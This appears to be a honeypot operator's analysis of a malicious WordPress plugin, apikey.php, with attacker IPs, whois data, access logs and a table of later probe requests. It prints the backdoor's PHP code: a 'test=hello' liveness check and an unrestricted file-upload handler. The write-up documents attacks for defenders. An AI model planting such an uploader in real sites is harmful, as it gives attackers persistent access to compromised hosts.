Download of a small PHP file that can (a) check access, (b) download files to the compromised WordPress host.
Update 2019-05-28: Honey pot caught a small campaign
to install apikey.php again.
I have modified my honey pot to recogize URLs ending in "apikey.php",
so it answered when the attacker made a "hello" query of my honey pot.
Update 2019-10-05: Honey pot caught another campaign of
an updated version of apikey.php, with more features.
222.214.69.105 → 105.69.214.222.broad.ga.sc.dynamic.163data.com.cn
105.69.214.222.broad.ga.sc.dynamic.163data.com.cn does not have an A record in DNS
whois says it's owned by a Chinese telecom company:
inetnum: 222.208.0.0 - 222.215.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
Downloaded to my WordPress honey pot via a plugin update: /wp-admin/update.php?action=upload-plugin
The PHP file apikey.php has this annotation:
/**
* @package api key
*/
/*
Plugin Name: api key
*/
Is the "api key" name meant to be innocuous? A guick google on "api key wordpress" gives many, many results.
The same IP address immediately accessed the file so downloaded:
222.214.69.105 - - [01/Feb/2018:16:44:25 -0700] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 200 120 "http://stratigery.com/wp-content/plugins/apikey/apikey.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0"
The GET parameters passed in match the code:
if ("hello"==$_GET["test"])
{
echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
echo "true";
}
The "test=hello" parameter matches one of the two actions in the code. The access of apikey.php seems
like a validation test - did apikey.php get extracted correctly, and does it execute?
The second action in apikey.php is just a file upload service. If some keys in the $_FILES PHP superglobal
are set, presumably a file got uploaded, so apikey.php moves the file into place.
Shortly after this attack took place,
a number of other IP addresses tried to acces the apikey.php URL in "test" mode.
It's possible these attackers believe they used the download feature of apikey.php,
but I didn't update my honey pot to keep track of any files apikey.php might download until much later.
| Timestamp | Source IP Address | URI |
|---|---|---|
| 2018-02-01 16:44:25-07 | 222.214.69.105 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-02-09 02:20:33-07 | 18.219.100.147 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-02-09 02:36:39-07 | 18.219.100.147 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-02-09 23:37:47-07 | 188.162.37.43 | /wp-content/plugins/apikey/apikey.php |
| 2018-02-23 04:47:33-07 | 185.217.69.157 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-02-25 22:56:46-07 | 31.192.111.175 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-03-08 08:37:40-07 | 66.249.73.193 | /wp-content/plugins/apikey/apikey.php |
| 2018-05-04 07:07:14-06 | 185.25.50.150 | /wp-content/plugins/apikey/apikey.php?test=hello |
| 2018-05-19 16:18:29-06 | 194.187.251.155 | /wp-content/plugins/apikey/apikey.php?test=hello |